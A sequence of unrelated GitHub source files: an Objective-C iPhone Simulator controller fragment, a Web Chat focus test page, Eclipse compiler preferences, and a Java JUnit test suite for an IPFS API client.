*)session didStart:(BOOL)started withError:(NSError *)error { if (self.videoOutputURL) { NSLog(@"started: %@", error); self.videoController = [ZappVideoController new]; self.videoController.outputURL = self.videoOutputURL; [self.videoController start]; } } - (void)session:(DTiPhoneSimulatorSession *)session didEndWithError:(NSError *)error { NSLog(@"ended: %@", error); if (!error) { // Holy buckets, the simulator ended correctly! Read the output once more. [self readNewOutput]; } [self clearSession]; [self.callingQueue addOperationWithBlock:^{ self.completionBlock(error != nil); }]; } #pragma mark Private methods + (void)killSimulator; { NSTask *killTask = [NSTask new]; killTask.launchPath = @"/usr/bin/killall"; killTask.arguments = [NSArray arrayWithObject:@"iPhone Simulator"]; [killTask launch]; [killTask waitUntilExit]; } - (void)clearSession; { self.session.delegate = nil; self.session = nil; [self.videoController stop]; self.videoController = nil; [ZappSimulatorController killSimulator]; } - (void)readNewOutput; { if (!self.session) { return; } NSData *outputData = [self.fileHandle readDataToEndOfFile]; BOOL shouldStop = NO; if (outputData.length) { self.outputBlock([[NSString alloc] initWithData:outputData encoding:NSUTF8StringEncoding], &shouldStop); self.consecutiveBlankReads = 0; self.hasSuccessfulRead = YES; } else { self.consecutiveBlankReads++; if (self.consecutiveBlankReads > 30) { shouldStop = YES; } } if (shouldStop) { if (self.hasSuccessfulRead) { [self session:self.session didEndWithError:[NSError errorWithDomain:NSStringFromClass([self class]) code:1 userInfo:nil]]; } else { [self session:self.session didEndWithError:[NSError errorWithDomain:NSStringFromClass([self class]) code:2 userInfo:nil]]; } } if (self.session) { [self performSelector:@selector(readNewOutput) withObject:nil afterDelay:1.0]; } else { [self.fileHandle closeFile]; } } @end
{ "pile_set_name": "Github" }
<!DOCTYPE html> <html lang="en-US"> <head> <script crossorigin="anonymous" src="/__dist__/testharness.js"></script> <script crossorigin="anonymous" src="/__dist__/webchat-es5.js"></script> <link href="focusManagement.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="webchat"></div> <script type="text/babel" data-presets="env,stage-3,react"> const { conditions, createStore, elements, expect, host, pageObjects, shareObservable, timeouts, token } = window.WebChatTest; const { Components: { AdaptiveCardContent } } = window.WebChat; (async function() { const store = createStore(); const directLine = window.WebChat.createDirectLine({ token: await token.fetchDirectLineToken() }); const baseProps = { directLine, store }; const webChatElement = document.getElementById('webchat'); window.WebChat.renderWebChat(baseProps, webChatElement); await pageObjects.wait(conditions.uiConnected(), timeouts.directLine); await pageObjects.sendMessageViaSendBox('receiptcard', { waitForSend: true }); await pageObjects.wait(conditions.minNumActivitiesShown(2), timeouts.directLine); await pageObjects.wait(conditions.scrollToBottomCompleted(), timeouts.directLine); document.querySelector('img[tabindex="0"]').focus(); await host.sendShiftTab(); const focusingOnRoot = document.activeElement === document.querySelector('.webchat__adaptive-card-renderer').firstChild; expect(focusingOnRoot).toBe(true); // The whole card should become yellow as the focus moved on it. await host.snapshot(); await host.done(); })().catch(async err => { console.error(err); await host.error(err); }); </script> </body> </html>
{ "pile_set_name": "Github" }
eclipse.preferences.version=1 org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled org.eclipse.jdt.core.compiler.codegen.targetPlatform=12 org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve org.eclipse.jdt.core.compiler.compliance=12 org.eclipse.jdt.core.compiler.debug.lineNumber=generate org.eclipse.jdt.core.compiler.debug.localVariable=generate org.eclipse.jdt.core.compiler.debug.sourceFile=generate org.eclipse.jdt.core.compiler.problem.assertIdentifier=error org.eclipse.jdt.core.compiler.problem.enablePreviewFeatures=disabled org.eclipse.jdt.core.compiler.problem.enumIdentifier=error org.eclipse.jdt.core.compiler.problem.reportPreviewFeatures=warning org.eclipse.jdt.core.compiler.release=enabled org.eclipse.jdt.core.compiler.source=12
{ "pile_set_name": "Github" }
package io.ipfs.api; import io.ipfs.api.cbor.*; import io.ipfs.cid.*; import io.ipfs.multihash.Multihash; import io.ipfs.multiaddr.MultiAddress; import org.junit.*; import java.io.*; import java.nio.file.*; import java.util.*; import java.util.concurrent.*; import java.util.function.*; import java.util.stream.*; import static org.junit.Assert.assertTrue; public class APITest { private final IPFS ipfs = new IPFS(new MultiAddress("/ip4/127.0.0.1/tcp/5001")); private final Random r = new Random(33550336); // perfect @Test public void dag() throws IOException { String original = "{\"data\":1234}"; byte[] object = original.getBytes(); MerkleNode put = ipfs.dag.put("json", object); Cid expected = Cid.decode("zdpuAs3whHmb9T1NkHSLGF45ykcKrEBxSLiEx6YpLzmKbQLEB"); Multihash result = put.hash; Assert.assertTrue("Correct cid returned", result.equals(expected)); byte[] get = ipfs.dag.get(expected); Assert.assertTrue("Raw data equal", original.equals(new String(get).trim())); } @Test public void dagCbor() throws IOException { Map<String, CborObject> tmp = new LinkedHashMap<>(); String value = "G'day mate!"; tmp.put("data", new CborObject.CborString(value)); CborObject original = CborObject.CborMap.build(tmp); byte[] object = original.toByteArray(); MerkleNode put = ipfs.dag.put("cbor", object); Cid cid = (Cid) put.hash; byte[] get = ipfs.dag.get(cid); Assert.assertTrue("Raw data equal", ((Map)JSONParser.parse(new String(get))).get("data").equals(value)); Cid expected = Cid.decode("zdpuApemz4XMURSCkBr9W5y974MXkSbeDfLeZmiQTPpvkatFF"); Assert.assertTrue("Correct cid returned", cid.equals(expected)); } @Test public void keys() throws IOException { List<KeyInfo> existing = ipfs.key.list(); String name = "mykey" + System.nanoTime(); KeyInfo gen = ipfs.key.gen(name, Optional.of("rsa"), Optional.of("2048")); String newName = "bob" + System.nanoTime(); Object rename = ipfs.key.rename(name, newName); List<KeyInfo> rm = ipfs.key.rm(newName); List<KeyInfo> remaining = ipfs.key.list(); Assert.assertTrue("removed key", remaining.equals(existing)); } @Test public void ipldNode() { Function<Stream<Pair<String, CborObject>>, CborObject.CborMap> map = s -> CborObject.CborMap.build(s.collect(Collectors.toMap(p -> p.left, p -> p.right))); CborObject.CborMap a = map.apply(Stream.of(new Pair<>("b", new CborObject.CborLong(1)))); CborObject.CborMap cbor = map.apply(Stream.of(new Pair<>("a", a), new Pair<>("c", new CborObject.CborLong(2)))); IpldNode.CborIpldNode node = new IpldNode.CborIpldNode(cbor); List<String> tree = node.tree("", -1); Assert.assertTrue("Correct tree", tree.equals(Arrays.asList("/a/b", "/c"))); } @Test public void singleFileTest() throws IOException { NamedStreamable.ByteArrayWrapper file = new NamedStreamable.ByteArrayWrapper("hello.txt", "G'day world! IPFS rocks!".getBytes()); fileTest(file); } @Test public void wrappedSingleFileTest() throws IOException { NamedStreamable.ByteArrayWrapper file = new NamedStreamable.ByteArrayWrapper("hello.txt", "G'day world! IPFS rocks!".getBytes()); List<MerkleNode> addParts = ipfs.add(file, true); MerkleNode filePart = addParts.get(0); MerkleNode dirPart = addParts.get(1); byte[] catResult = ipfs.cat(filePart.hash); byte[] getResult = ipfs.get(filePart.hash); if (!Arrays.equals(catResult, file.getContents())) throw new IllegalStateException("Different contents!"); List<Multihash> pinRm = ipfs.pin.rm(dirPart.hash, true); if (!pinRm.get(0).equals(dirPart.hash)) throw new IllegalStateException("Didn't remove file!"); Object gc = ipfs.repo.gc(); } @Test public void dirTest() throws IOException { Path test = Files.createTempDirectory("test"); Files.write(test.resolve("file.txt"), "G'day IPFS!".getBytes()); NamedStreamable dir = new NamedStreamable.FileWrapper(test.toFile()); List<MerkleNode> add = ipfs.add(dir); MerkleNode addResult = add.get(add.size() - 1); List<MerkleNode> ls = ipfs.ls(addResult.hash); Assert.assertTrue(ls.size() > 0); } @Test public void directoryTest() throws IOException { Random rnd = new Random(); String dirName = "folder" + rnd.nextInt(100); Path tmpDir = Files.createTempDirectory(dirName); String fileName = "afile" + rnd.nextInt(100); Path file = tmpDir.resolve(fileName); FileOutputStream fout = new FileOutputStream(file.toFile()); byte[] fileContents = "IPFS rocks!".getBytes(); fout.write(fileContents); fout.flush(); fout.close(); String subdirName = "subdir"; tmpDir.resolve(subdirName).toFile().mkdir(); String subfileName = "subdirfile" + rnd.nextInt(100); Path subdirfile = tmpDir.resolve(subdirName + "/" + subfileName); FileOutputStream fout2 = new FileOutputStream(subdirfile.toFile()); byte[] file2Contents = "IPFS still rocks!".getBytes(); fout2.write(file2Contents); fout2.flush(); fout2.close(); List<MerkleNode> addParts = ipfs.add(new NamedStreamable.FileWrapper(tmpDir.toFile())); MerkleNode addResult = addParts.get(addParts.size() - 1); List<MerkleNode> lsResult = ipfs.ls(addResult.hash); if (lsResult.size() != 2) throw new IllegalStateException("Incorrect number of objects in ls!"); if (! lsResult.stream().map(x -> x.name.get()).collect(Collectors.toSet()).equals(new HashSet<>(Arrays.asList(subdirName, fileName)))) throw new IllegalStateException("Dir not returned in ls!"); byte[] catResult = ipfs.cat(addResult.hash, "/" + fileName); if (! Arrays.equals(catResult, fileContents)) throw new IllegalStateException("Different contents!"); byte[] catResult2 = ipfs.cat(addResult.hash, "/" + subdirName + "/" + subfileName); if (! Arrays.equals(catResult2, file2Contents)) throw new IllegalStateException("Different contents!"); } // @Test public void largeFileTest() throws IOException { byte[] largerData = new byte[100*1024*1024]; new Random(1).nextBytes(largerData); NamedStreamable.ByteArrayWrapper largeFile = new NamedStreamable.ByteArrayWrapper("nontrivial.txt", largerData); fileTest(largeFile); } // @Test public void hugeFileStreamTest() throws IOException { byte[] hugeData = new byte[1000*1024*1024]; new Random(1).nextBytes(hugeData); NamedStreamable.ByteArrayWrapper largeFile = new NamedStreamable.ByteArrayWrapper("massive.txt", hugeData); MerkleNode addResult = ipfs.add(largeFile).get(0); InputStream in = ipfs.catStream(addResult.hash); byte[] res = new byte[hugeData.length]; int offset = 0; byte[] buf = new byte[4096]; int r; while ((r = in.read(buf)) >= 0) { try { System.arraycopy(buf, 0, res, offset, r); offset += r; }catch (Exception e){ e.printStackTrace(); } } if (!Arrays.equals(res, hugeData)) throw new IllegalStateException("Different contents!"); } @Test public void hostFileTest() throws IOException { Path tempFile = Files.createTempFile("IPFS", "tmp"); BufferedWriter w = new BufferedWriter(new FileWriter(tempFile.toFile())); w.append("Some data"); w.flush(); w.close(); NamedStreamable hostFile = new NamedStreamable.FileWrapper(tempFile.toFile()); fileTest(hostFile); } @Test public void hashOnly() throws IOException { byte[] data = randomBytes(4096); NamedStreamable file = new NamedStreamable.ByteArrayWrapper(data); MerkleNode addResult = ipfs.add(file, false, true).get(0); List<Multihash> local = ipfs.refs.local(); if (local.contains(addResult.hash)) throw new IllegalStateException("Object shouldn't be present!"); } public void fileTest(NamedStreamable file) throws IOException{ MerkleNode addResult = ipfs.add(file).get(0); byte[] catResult = ipfs.cat(addResult.hash); byte[] getResult = ipfs.get(addResult.hash); if (!Arrays.equals(catResult, file.getContents())) throw new IllegalStateException("Different contents!"); List<Multihash> pinRm = ipfs.pin.rm(addResult.hash, true); if (!pinRm.get(0).equals(addResult.hash)) throw new IllegalStateException("Didn't remove file!"); Object gc = ipfs.repo.gc(); } @Test public void pinTest() throws IOException { MerkleNode file = ipfs.add(new NamedStreamable.ByteArrayWrapper("some data".getBytes())).get(0); Multihash hash = file.hash; Map<Multihash, Object> ls1 = ipfs.pin.ls(IPFS.PinType.all); boolean pinned = ls1.containsKey(hash); List<Multihash> rm = ipfs.pin.rm(hash); // second rm should not throw a http 500, but return an empty list // List<Multihash> rm2 = ipfs.pin.rm(hash); List<Multihash> add2 = ipfs.pin.add(hash); // adding something already pinned should succeed List<Multihash> add3 = ipfs.pin.add(hash); Map<Multihash, Object> ls = ipfs.pin.ls(IPFS.PinType.recursive); ipfs.repo.gc(); // object should still be present after gc Map<Multihash, Object> ls2 = ipfs.pin.ls(IPFS.PinType.recursive); boolean stillPinned = ls2.containsKey(hash); Assert.assertTrue("Pinning works", pinned && stillPinned); } @Test public void pinUpdate() throws IOException { MerkleNode child1 = ipfs.add(new NamedStreamable.ByteArrayWrapper("some data".getBytes())).get(0); Multihash hashChild1 = child1.hash; System.out.println("child1: " + hashChild1); CborObject.CborMerkleLink root1 = new CborObject.CborMerkleLink(hashChild1); MerkleNode root1Res = ipfs.block.put(Collections.singletonList(root1.toByteArray()), Optional.of("cbor")).get(0); System.out.println("root1: " + root1Res.hash); ipfs.pin.add(root1Res.hash); CborObject.CborList root2 = new CborObject.CborList(Arrays.asList(new CborObject.CborMerkleLink(hashChild1), new CborObject.CborLong(42))); MerkleNode root2Res = ipfs.block.put(Collections.singletonList(root2.toByteArray()), Optional.of("cbor")).get(0); List<Multihash> update = ipfs.pin.update(root1Res.hash, root2Res.hash, true); Map<Multihash, Object> ls = ipfs.pin.ls(IPFS.PinType.all); boolean childPresent = ls.containsKey(hashChild1); if (!childPresent) throw new IllegalStateException("Child not present!"); ipfs.repo.gc(); Map<Multihash, Object> ls2 = ipfs.pin.ls(IPFS.PinType.all); boolean childPresentAfterGC = ls2.containsKey(hashChild1); if (!childPresentAfterGC) throw new IllegalStateException("Child not present!"); } @Test public void rawLeafNodePinUpdate() throws IOException { MerkleNode child1 = ipfs.block.put("some data".getBytes(), Optional.of("raw")); Multihash hashChild1 = child1.hash; System.out.println("child1: " + hashChild1); CborObject.CborMerkleLink root1 = new CborObject.CborMerkleLink(hashChild1); MerkleNode root1Res = ipfs.block.put(Collections.singletonList(root1.toByteArray()), Optional.of("cbor")).get(0); System.out.println("root1: " + root1Res.hash); ipfs.pin.add(root1Res.hash); MerkleNode child2 = ipfs.block.put("G'day new tree".getBytes(), Optional.of("raw")); Multihash hashChild2 = child2.hash; CborObject.CborList root2 = new CborObject.CborList(Arrays.asList( new CborObject.CborMerkleLink(hashChild1), new CborObject.CborMerkleLink(hashChild2), new CborObject.CborLong(42)) ); MerkleNode root2Res = ipfs.block.put(Collections.singletonList(root2.toByteArray()), Optional.of("cbor")).get(0); List<Multihash> update = ipfs.pin.update(root1Res.hash, root2Res.hash, false); } @Test public void indirectPinTest() throws IOException { Multihash EMPTY = ipfs.object._new(Optional.empty()).hash; io.ipfs.api.MerkleNode data = ipfs.object.patch(EMPTY, "set-data", Optional.of("childdata".getBytes()), Optional.empty(), Optional.empty()); Multihash child = data.hash; io.ipfs.api.MerkleNode tmp1 = ipfs.object.patch(EMPTY, "set-data", Optional.of("parent1_data".getBytes()), Optional.empty(), Optional.empty()); Multihash parent1 = ipfs.object.patch(tmp1.hash, "add-link", Optional.empty(), Optional.of(child.toString()), Optional.of(child)).hash; ipfs.pin.add(parent1); io.ipfs.api.MerkleNode tmp2 = ipfs.object.patch(EMPTY, "set-data", Optional.of("parent2_data".getBytes()), Optional.empty(), Optional.empty()); Multihash parent2 = ipfs.object.patch(tmp2.hash, "add-link", Optional.empty(), Optional.of(child.toString()), Optional.of(child)).hash; ipfs.pin.add(parent2); ipfs.pin.rm(parent1, true); Map<Multihash, Object> ls = ipfs.pin.ls(IPFS.PinType.all); boolean childPresent = ls.containsKey(child); if (!childPresent) throw new IllegalStateException("Child not present!"); ipfs.repo.gc(); Map<Multihash, Object> ls2 = ipfs.pin.ls(IPFS.PinType.all); boolean childPresentAfterGC = ls2.containsKey(child); if (!childPresentAfterGC) throw new IllegalStateException("Child not present!"); } @Test public void objectPatch() throws IOException { MerkleNode obj = ipfs.object._new(Optional.empty()); Multihash base = obj.hash; // link tests String linkName = "alink"; MerkleNode addLink = ipfs.object.patch(base, "add-link", Optional.empty(), Optional.of(linkName), Optional.of(base)); MerkleNode withLink = ipfs.object.get(addLink.hash); if (withLink.links.size() != 1 || !withLink.links.get(0).hash.equals(base) || !withLink.links.get(0).name.get().equals(linkName)) throw new RuntimeException("Added link not correct!"); MerkleNode rmLink = ipfs.object.patch(addLink.hash, "rm-link", Optional.empty(), Optional.of(linkName), Optional.empty()); if (!rmLink.hash.equals(base)) throw new RuntimeException("Adding not inverse of removing link!"); // data tests // byte[] data = "some random textual data".getBytes(); byte[] data = new byte[1024]; new Random().nextBytes(data); MerkleNode patched = ipfs.object.patch(base, "set-data", Optional.of(data), Optional.empty(), Optional.empty()); byte[] patchedResult = ipfs.object.data(patched.hash); if (!Arrays.equals(patchedResult, data)) throw new RuntimeException("object.patch: returned data != stored data!"); MerkleNode twicePatched = ipfs.object.patch(patched.hash, "append-data", Optional.of(data), Optional.empty(), Optional.empty()); byte[] twicePatchedResult = ipfs.object.data(twicePatched.hash); byte[] twice = new byte[2*data.length]; for (int i=0; i < 2; i++) System.arraycopy(data, 0, twice, i*data.length, data.length); if (!Arrays.equals(twicePatchedResult, twice)) throw new RuntimeException("object.patch: returned data after append != stored data!"); } @Test public void refsTest() throws IOException { List<Multihash> local = ipfs.refs.local(); for (Multihash ref: local) { Object refs = ipfs.refs(ref, false); } } @Test public void objectTest() throws IOException { MerkleNode _new = ipfs.object._new(Optional.empty()); Multihash pointer = Multihash.fromBase58("QmPZ9gcCEpqKTo6aq61g2nXGUhM4iCL3ewB6LDXZCtioEB"); MerkleNode object = ipfs.object.get(pointer); List<MerkleNode> newPointer = ipfs.object.put(Arrays.asList(object.toJSONString().getBytes())); List<MerkleNode> newPointer2 = ipfs.object.put("json", Arrays.asList(object.toJSONString().getBytes())); MerkleNode links = ipfs.object.links(pointer); byte[] data = ipfs.object.data(pointer); Map stat = ipfs.object.stat(pointer); } @Test public void blockTest() throws IOException { MerkleNode pointer = new MerkleNode("QmPZ9gcCEpqKTo6aq61g2nXGUhM4iCL3ewB6LDXZCtioEB"); Map stat = ipfs.block.stat(pointer.hash); byte[] object = ipfs.block.get(pointer.hash); List<MerkleNode> newPointer = ipfs.block.put(Arrays.asList("Some random data...".getBytes())); } @Test public void bulkBlockTest() throws IOException { CborObject cbor = new CborObject.CborString("G'day IPFS!"); byte[] raw = cbor.toByteArray(); List<MerkleNode> bulkPut = ipfs.block.put(Arrays.asList(raw, raw, raw, raw, raw), Optional.of("cbor")); List<Multihash> hashes = bulkPut.stream().map(m -> m.hash).collect(Collectors.toList()); byte[] result = ipfs.block.get(hashes.get(0)); System.out.println(); } @Ignore // Ignored because ipfs frequently times out internally in the publish call @Test public void publish() throws Exception { // JSON document String json = "{\"name\":\"blogpost\",\"documents\":[]}"; // Add a DAG node to IPFS MerkleNode merkleNode = ipfs.dag.put("json", json.getBytes()); Assert.assertEquals("expected to be zdpuAknRh1Kro2r2xBDKiXyTiwA3Nu5XcmvjRPA1VNjH41NF7" , "zdpuAknRh1Kro2r2xBDKiXyTiwA3Nu5XcmvjRPA1VNjH41NF7", merkleNode.hash.toString()); // Get a DAG node byte[] res = ipfs.dag.get((Cid) merkleNode.hash); Assert.assertEquals("Should be equals", JSONParser.parse(json), JSONParser.parse(new String(res))); // Publish to IPNS Map result = ipfs.name.publish(merkleNode.hash); // Resolve from IPNS String resolved = ipfs.name.resolve(Multihash.fromBase58((String) result.get("Name"))); Assert.assertEquals("Should be equals", resolved, "/ipfs/" + merkleNode.hash.toString()); } @Test public void pubsubSynchronous() throws Exception { String topic = "topic" + System.nanoTime(); List<Map<String, Object>> res = Collections.synchronizedList(new ArrayList<>()); new Thread(() -> { try { ipfs.pubsub.sub(topic, res::add, t -> t.printStackTrace()); } catch (IOException e) { throw new RuntimeException(e);} }).start(); int nMessages = 100; for (int i = 1; i < nMessages; ) { ipfs.pubsub.pub(topic, "Hello!"); if (res.size() >= i) { i++; } } Assert.assertTrue(res.size() > nMessages - 5); // pubsub is not reliable so it loses messages } @Test public void pubsub() throws Exception { String topic = "topic" + System.nanoTime(); Stream<Map<String, Object>> sub = ipfs.pubsub.sub(topic); String data = "Hello!"; Object pub = ipfs.pubsub.pub(topic, data); Object pub2 = ipfs.pubsub.pub(topic, "G'day"); List<Map> results = sub.limit(2).collect(Collectors.toList()); Assert.assertTrue( ! results.get(0).equals(Collections.emptyMap())); } private static String toEscapedHex(byte[] in) throws IOException { StringBuilder res = new StringBuilder(); for (byte b : in) { res.append("\\x"); res.append(String.format("%02x", b & 0xFF)); } return res.toString(); } /** * Test that merkle links in values of a cbor map are followed during recursive pins */ @Test public void merkleLinkInMap() throws IOException { Random r = new Random(); CborObject.CborByteArray target = new CborObject.CborByteArray(("g'day IPFS!").getBytes()); byte[] rawTarget = target.toByteArray(); MerkleNode targetRes = ipfs.block.put(Arrays.asList(rawTarget), Optional.of("cbor")).get(0); CborObject.CborMerkleLink link = new CborObject.CborMerkleLink(targetRes.hash); Map<String, CborObject> m = new TreeMap<>(); m.put("alink", link); m.put("arr", new CborObject.CborList(Collections.emptyList())); CborObject.CborMap source = CborObject.CborMap.build(m); byte[] rawSource = source.toByteArray(); MerkleNode sourceRes = ipfs.block.put(Arrays.asList(rawSource), Optional.of("cbor")).get(0); CborObject.fromByteArray(rawSource); List<Multihash> add = ipfs.pin.add(sourceRes.hash); ipfs.repo.gc(); ipfs.repo.gc(); List<Multihash> refs = ipfs.refs(sourceRes.hash, true); Assert.assertTrue("refs returns links", refs.contains(targetRes.hash)); byte[] bytes = ipfs.block.get(targetRes.hash); Assert.assertTrue("same contents after GC", Arrays.equals(bytes, rawTarget)); // These commands can be used to reproduce this on the command line String reproCommand1 = "printf \"" + toEscapedHex(rawTarget) + "\" | ipfs block put --format=cbor"; String reproCommand2 = "printf \"" + toEscapedHex(rawSource) + "\" | ipfs block put --format=cbor"; System.out.println(); } @Test public void recursiveRefs() throws IOException { CborObject.CborByteArray leaf1 = new CborObject.CborByteArray(("G'day IPFS!").getBytes()); byte[] rawLeaf1 = leaf1.toByteArray(); MerkleNode leaf1Res = ipfs.block.put(Arrays.asList(rawLeaf1), Optional.of("cbor")).get(0); CborObject.CborMerkleLink link = new CborObject.CborMerkleLink(leaf1Res.hash); Map<String, CborObject> m = new TreeMap<>(); m.put("link1", link); CborObject.CborMap source = CborObject.CborMap.build(m); MerkleNode sourceRes = ipfs.block.put(Arrays.asList(source.toByteArray()), Optional.of("cbor")).get(0); CborObject.CborByteArray leaf2 = new CborObject.CborByteArray(("G'day again, IPFS!").getBytes()); byte[] rawLeaf2 = leaf2.toByteArray(); MerkleNode leaf2Res = ipfs.block.put(Arrays.asList(rawLeaf2), Optional.of("cbor")).get(0); Map<String, CborObject> m2 = new TreeMap<>(); m2.put("link1", new CborObject.CborMerkleLink(sourceRes.hash)); m2.put("link2", new CborObject.CborMerkleLink(leaf2Res.hash)); CborObject.CborMap source2 = CborObject.CborMap.build(m2); MerkleNode rootRes = ipfs.block.put(Arrays.asList(source2.toByteArray()), Optional.of("cbor")).get(0); List<Multihash> refs = ipfs.refs(rootRes.hash, false); boolean correct = refs.contains(sourceRes.hash) && refs.contains(leaf2Res.hash) && refs.size() == 2; Assert.assertTrue("refs returns links", correct); List<Multihash> refsRecurse = ipfs.refs(rootRes.hash, true); boolean correctRecurse = refs.contains(sourceRes.hash) && refs.contains(leaf1Res.hash) && refs.contains(leaf2Res.hash) && refs.size() == 3; Assert.assertTrue("refs returns links", correct); } /** * Test that merkle links as a root object are followed during recursive pins */ @Test public void rootMerkleLink() throws IOException { Random r = new Random(); CborObject.CborByteArray target = new CborObject.CborByteArray(("g'day IPFS!" + r.nextInt()).getBytes()); byte[] rawTarget = target.toByteArray(); MerkleNode block1 = ipfs.block.put(Arrays.asList(rawTarget), Optional.of("cbor")).get(0); Multihash block1Hash = block1.hash; byte[] retrievedObj1 = ipfs.block.get(block1Hash); Assert.assertTrue("get inverse of put", Arrays.equals(retrievedObj1, rawTarget)); CborObject.CborMerkleLink cbor2 = new CborObject.CborMerkleLink(block1.hash); byte[] obj2 = cbor2.toByteArray(); MerkleNode block2 = ipfs.block.put(Arrays.asList(obj2), Optional.of("cbor")).get(0); byte[] retrievedObj2 = ipfs.block.get(block2.hash); Assert.assertTrue("get inverse of put", Arrays.equals(retrievedObj2, obj2)); List<Multihash> add = ipfs.pin.add(block2.hash); ipfs.repo.gc(); ipfs.repo.gc(); byte[] bytes = ipfs.block.get(block1.hash); Assert.assertTrue("same contents after GC", Arrays.equals(bytes, rawTarget)); // These commands can be used to reproduce this on the command line String reproCommand1 = "printf \"" + toEscapedHex(rawTarget) + "\" | ipfs block put --format=cbor"; String reproCommand2 = "printf \"" + toEscapedHex(obj2) + "\" | ipfs block put --format=cbor"; System.out.println(); } /** * Test that a cbor null is allowed as an object root */ @Test public void rootNull() throws IOException { CborObject.CborNull cbor = new CborObject.CborNull(); byte[] obj = cbor.toByteArray(); MerkleNode block = ipfs.block.put(Arrays.asList(obj), Optional.of("cbor")).get(0); byte[] retrievedObj = ipfs.block.get(block.hash); Assert.assertTrue("get inverse of put", Arrays.equals(retrievedObj, obj)); List<Multihash> add = ipfs.pin.add(block.hash); ipfs.repo.gc(); ipfs.repo.gc(); // These commands can be used to reproduce this on the command line String reproCommand1 = "printf \"" + toEscapedHex(obj) + "\" | ipfs block put --format=cbor"; System.out.println(); } /** * Test that merkle links in a cbor list are followed during recursive pins */ @Test public void merkleLinkInList() throws IOException { Random r = new Random(); CborObject.CborByteArray target = new CborObject.CborByteArray(("g'day IPFS!" + r.nextInt()).getBytes()); byte[] rawTarget = target.toByteArray(); MerkleNode targetRes = ipfs.block.put(Arrays.asList(rawTarget), Optional.of("cbor")).get(0); CborObject.CborMerkleLink link = new CborObject.CborMerkleLink(targetRes.hash); CborObject.CborList source = new CborObject.CborList(Arrays.asList(link)); byte[] rawSource = source.toByteArray(); MerkleNode sourceRes = ipfs.block.put(Arrays.asList(rawSource), Optional.of("cbor")).get(0); List<Multihash> add = ipfs.pin.add(sourceRes.hash); ipfs.repo.gc(); ipfs.repo.gc(); byte[] bytes = ipfs.block.get(targetRes.hash); Assert.assertTrue("same contents after GC", Arrays.equals(bytes, rawTarget)); // These commands can be used to reproduce this on the command line String reproCommand1 = "printf \"" + toEscapedHex(rawTarget) + "\" | ipfs block put --format=cbor"; String reproCommand2 = "printf \"" + toEscapedHex(rawSource) + "\" | ipfs block put --format=cbor"; } @Test public void fileContentsTest() throws IOException { ipfs.repo.gc(); List<Multihash> local = ipfs.refs.local(); for (Multihash hash: local) { try { Map ls = ipfs.file.ls(hash); return; } catch (Exception e) {} // non unixfs files will throw an exception here } } @Test @Ignore("name test may hang forever") public void nameTest() throws IOException { MerkleNode pointer = new MerkleNode("QmPZ9gcCEpqKTo6aq61g2nXGUhM4iCL3ewB6LDXZCtioEB"); Map pub = ipfs.name.publish(pointer.hash); String name = "key" + System.nanoTime(); Object gen = ipfs.key.gen(name, Optional.of("rsa"), Optional.of("2048")); Map mykey = ipfs.name.publish(pointer.hash, Optional.of(name)); String resolved = ipfs.name.resolve(Multihash.fromBase58((String) pub.get("Name"))); } @Test public void dnsTest() throws IOException { String domain = "ipfs.io"; String dns = ipfs.dns(domain, true); } public void mountTest() throws IOException { Map mount = ipfs.mount(null, null); } @Test public void dhtTest() throws IOException { MerkleNode raw = ipfs.block.put("Mathematics is wonderful".getBytes(), Optional.of("raw")); // Map get = ipfs.dht.get(raw.hash); // Map put = ipfs.dht.put("somekey", "somevalue"); List<Map<String, Object>> findprovs = ipfs.dht.findprovs(raw.hash); List<Peer> peers = ipfs.swarm.peers(); Map query = ipfs.dht.query(peers.get(0).id); Map find = ipfs.dht.findpeer(peers.get(0).id); } @Test public void localId() throws Exception { Map id = ipfs.id(); System.out.println(); } @Test public void statsTest() throws IOException { Map stats = ipfs.stats.bw(); } public void resolveTest() throws IOException { Multihash hash = Multihash.fromBase58("QmatmE9msSfkKxoffpHwNLNKgwZG8eT9Bud6YoPab52vpy"); Map res = ipfs.resolve("ipns", hash, false); } @Test public void swarmTest() throws IOException { Map<Multihash, List<MultiAddress>> addrs = ipfs.swarm.addrs(); if (addrs.size() > 0) { boolean contacted = addrs.entrySet().stream() .anyMatch(e -> { Multihash target = e.getKey(); List<MultiAddress> nodeAddrs = e.getValue(); boolean contactable = nodeAddrs.stream() .anyMatch(addr -> { try { MultiAddress peer = new MultiAddress(addr.toString() + "/ipfs/" + target.toBase58()); Map connect = ipfs.swarm.connect(peer); Map disconnect = ipfs.swarm.disconnect(peer); return true; } catch (Exception ex) { return false; } }); try { Map id = ipfs.id(target); Map ping = ipfs.ping(target); return contactable; } catch (Exception ex) { // not all nodes have to be contactable return false; } }); if (!contacted) throw new IllegalStateException("Couldn't contact any node!"); } List<Peer> peers = ipfs.swarm.peers(); System.out.println(peers); } @Test public void bootstrapTest() throws IOException { List<MultiAddress> bootstrap = ipfs.bootstrap.list(); System.out.println(bootstrap); List<MultiAddress> rm = ipfs.bootstrap.rm(bootstrap.get(0), false); List<MultiAddress> add = ipfs.bootstrap.add(bootstrap.get(0)); System.out.println(); } @Test public void diagTest() throws IOException { Map config = ipfs.config.show(); Object mdns = ipfs.config.get("Discovery.MDNS.Interval"); Object val = ipfs.config.get("Datastore.GCPeriod"); Map setResult = ipfs.config.set("Datastore.GCPeriod", val); ipfs.config.replace(new NamedStreamable.ByteArrayWrapper(JSONParser.toString(config).getBytes())); // Object log = ipfs.log(); String sys = ipfs.diag.sys(); String cmds = ipfs.diag.cmds(); } @Test public void toolsTest() throws IOException { String version = ipfs.version(); int major = Integer.parseInt(version.split("\\.")[0]); int minor = Integer.parseInt(version.split("\\.")[1]); assertTrue(major >= 0 && minor >= 4); // Requires at least 0.4.0 Map commands = ipfs.commands(); } @Test(expected = RuntimeException.class) public void testTimeoutFail() throws IOException { IPFS ipfs = new IPFS(new MultiAddress("/ip4/127.0.0.1/tcp/5001")).timeout(1000); ipfs.cat(Multihash.fromBase58("QmYpbSXyiCTYCbyMpzrQNix72nBYB8WRv6i39JqRc8C1ry")); } @Test public void testTimeoutOK() throws IOException { IPFS ipfs = new IPFS(new MultiAddress("/ip4/127.0.0.1/tcp/5001")).timeout(1000); ipfs.cat(Multihash.fromBase58("Qmaisz6NMhDB51cCvNWa1GMS7LU1pAxdF4Ld6Ft9kZEP2a")); } // this api is disabled until deployment over IPFS is enabled public void updateTest() throws IOException { Object check = ipfs.update.check(); Object update = ipfs.update(); } private byte[] randomBytes(int len) { byte[] res = new byte[len]; 